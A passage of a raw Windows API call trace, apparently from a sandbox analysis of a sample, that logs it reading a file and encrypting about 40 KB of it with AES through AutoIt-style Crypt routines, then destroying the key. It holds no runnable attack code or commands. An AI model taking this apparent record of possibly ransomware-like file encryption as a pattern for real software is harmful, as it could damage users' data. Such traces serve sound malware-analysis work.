[0034.551] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x9fdd, lpOverlapped=0x0) returned 1 [0034.553] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0034.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0034.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.556] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0034.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.556] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0034.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0034.556] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0034.557] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0034.557] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.557] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da3c8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da3c8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0034.557] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.557] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.557] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.557] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0034.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.557] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.557] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.557] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.557] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.557] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.557] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.558] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.558] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0034.558] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.558] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.558] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.558] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.558] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.558] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.558] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0034.558] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.558] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.559] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x9fdd, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x9fe0) returned 1 [0034.559] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.559] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.559] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.559] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.559] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.559] CharLowerBuffW (in: lpsz="byte[40929]", cchLength=0xb | out: lpsz="byte[40929]") returned 0xb [0034.559] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.559] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.559] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.560] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.560] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.560] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x972fd0*, pdwDataLen=0x6ae220*=0x9fdd, dwBufLen=0x9fe0 | out: pbData=0x972fd0*, pdwDataLen=0x6ae220*=0x9fe0) returned 1 [0034.560] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.560] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.560] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0034.560] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.560] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.560] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.560] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.560] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0034.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.561] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.561] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.561] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.561] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0034.561] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.561] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.561] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.561] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.561] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.561] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0034.561] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.566] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.566] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.566] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0034.566] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.567] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.567] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.567] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0034.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.567] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.568] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.568] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.568] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0034.568] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.568] CryptDestroyKey (hKey=0x7c2200) returned 1 [0034.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0034.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0034.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0034.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0034.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0034.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0034.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0034.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0034.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0034.568] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0034.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0034.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.568] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a30 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.569] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0034.569] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0034.569] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.570] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0034.570] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0034.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0034.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8f8 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.570] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.570] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0034.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cec8 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0034.570] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.570] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0034.570] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd90 [0034.571] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0034.571] RtlAllocateHeap 